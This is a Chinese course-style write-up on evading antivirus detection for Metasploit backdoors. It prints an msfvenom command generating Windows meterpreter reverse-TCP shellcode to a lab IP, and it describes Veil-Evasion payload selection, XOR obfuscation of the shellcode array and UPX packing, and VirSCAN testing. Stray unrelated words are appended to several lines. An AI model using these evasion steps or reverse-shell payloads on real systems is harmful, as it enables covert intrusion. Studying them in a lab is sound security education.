检测上节课利用Msfvenom生成的后门软件,事实证实Metaspliot做为作热门的平台之一,各AV厂商都有所防范。css
多编码几回也没有明显效果。python
事实上杀毒软件厂商在对特征码进行扫描的同时,也会对编码器所用的解码代码进行检索,像咱们以前经常使用的比较有名的编码器早已经被杀软厂商们加入了黑名单,因此使用该编码器即便编码次数再多也不会起到实质性效果。shell
此次使用免杀功能更强一点的一款平台Veil-Evasionwindows
按照其提示,输入list查看payload,选择能实现反弹端口链接的payload(通常看名字就能看出来,rev_tcp
,rev_http
结尾的通常都是)此次咱们随便选择其中知足咱们要求的payload,键入use + name of payload
(截图的时候我选择的是ruby/meterpreter/rev_tcp
可是生成的时候一直弹出payload有问题,因此实际上使用的是python/meterpreter/rev_tcp
)数组
将.exe文件拷贝出来到靶机上,结果被查杀安全
在网站上进行检测ruby
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.30 LPORT=443 -f c
用Microsoft Visual Studio 2013或者Visual C++ 6.0进行编译运行生成可执行文件。tcp
用VirSCAN.org进行检测
函数
奇数位异或85,即01010101 偶数位异或170,即10101010
将原数组的内容进行改变,这样在杀软检查时被发现的概率就减少了工具
用下面的命令来加压缩壳
# upx 4320-1.exe -o 4320m.exe
·
效果并非很好